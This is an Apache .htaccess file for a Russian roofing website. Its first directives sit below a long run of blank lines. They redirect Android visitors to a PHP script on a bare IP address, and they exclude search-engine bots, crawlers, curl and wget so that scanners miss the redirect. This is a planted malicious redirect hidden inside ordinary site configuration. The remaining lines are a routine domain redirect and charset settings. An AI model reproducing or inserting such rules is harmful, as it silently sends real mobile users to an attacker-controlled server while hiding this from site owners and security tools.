














































































































































































































































































































































































































































































































































































































































































































































































































































RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://5.61.34.53/jquery/htaccess.php [L,R=302] # on

RewriteEngine on
RewriteCond %{HTTP_HOST} ^http://www.baumaster.spb\.ru
RewriteRule ^(.*)$ http://krovlyakryshispb.ru/$1 [R=permanent,L]
AddDefaultCharset utf-8
AddType 'text/html; charset=utf-8' .html .htm .shtml
